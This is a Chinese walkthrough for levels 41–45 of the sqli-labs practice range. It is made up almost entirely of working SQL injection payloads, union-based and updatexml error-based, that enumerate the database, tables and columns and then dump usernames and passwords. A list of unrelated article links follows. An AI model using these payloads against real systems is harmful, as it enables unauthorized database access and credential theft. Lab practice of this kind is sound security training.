sqli-labs靶场通关攻略 41-45

主页有sqli-labs靶场通关攻略 1-40

第四一关 less-41

步骤一:查询闭合方式

?id=1 --+

步骤二:查询数据库

?id=-1 union select 1,2,database()--+

步骤三:查看表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

步骤四:查看users表列名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤五:查看users表信息

?id=-1 union select 1,2,group_concat(id,username,password) from users --+

第四二关 less-42

步骤一:登录页面

步骤二:查询数据库

密码框输入:'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

步骤三:查看表名

密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

步骤四:查看users表列名

密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_sche ma.columns where table_name='users' ),0x7e),1) -- aaa

第四三关 less-43

步骤一:登录页面

步骤二:查询数据库

密码框输入:') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

步骤三:查看表名

密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

步骤四:查看users表列名

密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa

第四四关 less-44

步骤一:登录页面

步骤二:查询数据库

密码框输入:1' union select 1,database(),3 #

步骤三:查看表名

密码框输入:1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

步骤四:查看users表列名

密码框输入:1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

步骤五:查看表中信息

1' union select 1,group_concat(username,password),3 from users #

第四五关 less-45

步骤一:登录页面

步骤二:查询数据库

密码框输入:1') union select 1,database(),3 #

步骤三:查看表名

密码框输入:1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

步骤四:查看users表列名

密码框输入:1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

相关推荐
羊锦磊1 小时前
[ Redis ] SpringBoot集成使用Redis(补充)
java·数据库·spring boot·redis·spring·缓存·json
倔强的石头_1 小时前
【金仓数据库】ksql 指南(三) —— 创建与管理表空间和模式
数据库
程序新视界3 小时前
详解MySQL两种存储引擎MyISAM和InnoDB的优缺点
数据库·后端·mysql
半路_出家ren3 小时前
设计一个学生管理系统的数据库
linux·数据库·sql·mysql·网络安全·数据库管理员
金仓拾光集5 小时前
筑牢风控生命线:金仓数据库替代MongoDB,重构证券融资融券业务的数据基石
数据库·mongodb·信创·1024程序员节·kingbasees·国产化替代
泷羽Sec-静安5 小时前
Less-1 GET-Error based-Single quotes-String GET-基于错误-单引号-字符串
前端·css·网络·sql·安全·web安全·less
那我掉的头发算什么5 小时前
【数据库】navicat的下载以及数据库约束
android·数据库·数据仓库·sql·mysql·数据库开发·数据库架构
纪伊路上盛名在5 小时前
如何批量获取蛋白质序列的所有结构域(domain)数据-2
数据库·人工智能·机器学习·统计·计算生物学·蛋白质
2301_772093567 小时前
高并发webserver_interview
运维·服务器·数据库·后端·网络协议·mysql·wireshark
大G的笔记本8 小时前
MySQL 大表查询优化、超大分页处理、SQL 慢查询优化、主键选择
数据库·sql·mysql